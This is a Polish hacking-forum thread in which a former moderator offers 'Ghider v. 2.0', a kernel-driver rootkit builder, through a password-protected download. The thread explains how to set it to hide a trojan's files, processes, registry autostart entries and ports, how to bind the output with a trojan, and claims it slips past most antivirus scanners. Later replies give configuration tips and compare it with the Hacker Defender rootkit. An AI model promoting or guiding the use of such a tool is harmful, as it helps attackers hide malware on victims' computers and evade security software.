Ghider v. 2.0

grzonu

Były Moderator
Dołączył
Grudzień 26, 2006
Posty
1390
Więc napisalem program ktory ukrywa nam dowolny plik,proces,wpis w rejestrze,port komunkacyjny.
Konfigurujemy go wpisujac w odpowiednie pola nazwe ktora chcemy ukryc(bez rozszerzen).
Przykladowo chcemy ukryc wszystkie pliki o nazwie trojan. Wiec wpisujemy w pole nazwa pliku trojan itd...

Jesli chcemu ukryc wiecej niz jeden plik to nadajmy tym plikom taki sam przedrostek np. troj i w pole wpiszmy sam przedrostek a wszystkie o tym przedrostku zostana ukryte

Naciskamy Generuj i pojawia sie nam plik o nazwie app.exe mozemy to teraz zbindowac np. z trojanem i trojan pozostanie niezauwazony (jego pliki,procesy,wpis autostartu); wiele antywirosow nawet pominie go w skanowaniu gdyz go nie zobaczy !!!

Dolaczylem do archiwum strzykawke dzieki ktorej mozemy usunac jednym go kliknieciem na wypadek gdyby ktos sie przypadkowo zarazil.

LINK
haslo: grzonu

//EDIT
sam sterownik nie jest wykrywalny przez zadnego antywirusa , ale instalator jest wykrywalny przez VBA32.
 

butek123

Użytkownik
Dołączył
Marzec 26, 2009
Posty
12
Witam,
Jak sprawdzić port programu, nazwę wartości rejestru?
I jeszcze jedno pytanko, Nazwą pliku (serwera) ma być taka jak jest zapisana na dysku? czy taka jak się zapisuje w procesie?
Pozdrawiam
 

grzonu

Były Moderator
Dołączył
Grudzień 26, 2006
Posty
1390
port programu no to musisz znac (jesli jest na protokole gg to nr portu jest 8074)
nazwa no to w opisie trojana musisz wiedziec pod jaka nazwa wystepuje,tak samo proces(nazwa procesu = nazwa pliku wykonywalnego)
tak samo wpisy w rejestrze. Jesli nie wiesz jak sie nazywaja konkretne pliki , procesy , wpisy w rejestrze to poprostu wlacz trojana u siebie i sprawdz i potem przepisz do konfiguratora
 

thc_flow

Zbanowany
Dołączył
Listopad 13, 2008
Posty
649
Całkiem miła alternatywa dla Hacker Defendera
<
 

grzonu

Były Moderator
Dołączył
Grudzień 26, 2006
Posty
1390
cytat z rootkit.com
Hacker Defender was a very common rootkit in the wild. It sports a user friendly inifile that controls its behaviour. It is 98% userland rootkit and some source-code is available. There are also commercial versions of Hacker Defender that brings new functionality together with protection against antivirus products and rootkit detectors.[/b]

a to jest kernelland , ale nie przecze ze Hacker Defender jest dobry
smile.gif
 

Ormin

Użytkownik
Dołączył
Kwiecień 19, 2007
Posty
8
Może jakieś wskazówki jak dokonales tego? Chętnie bym to zaimplementował u siebie, ale brakuje umiejętności : x próbowałem np. ukryć wpis w menedżerze zadań przez hook na EnumProcess, ale ni ch...
 

grzonu

Były Moderator
Dołączył
Grudzień 26, 2006
Posty
1390
no to jest Kernel land rootkit(sterownik) napisany w C
ktory hookuje kilka funkcji api
napisz na gg to ci moge wiecej wytlumaczyc
 
Do góry Bottom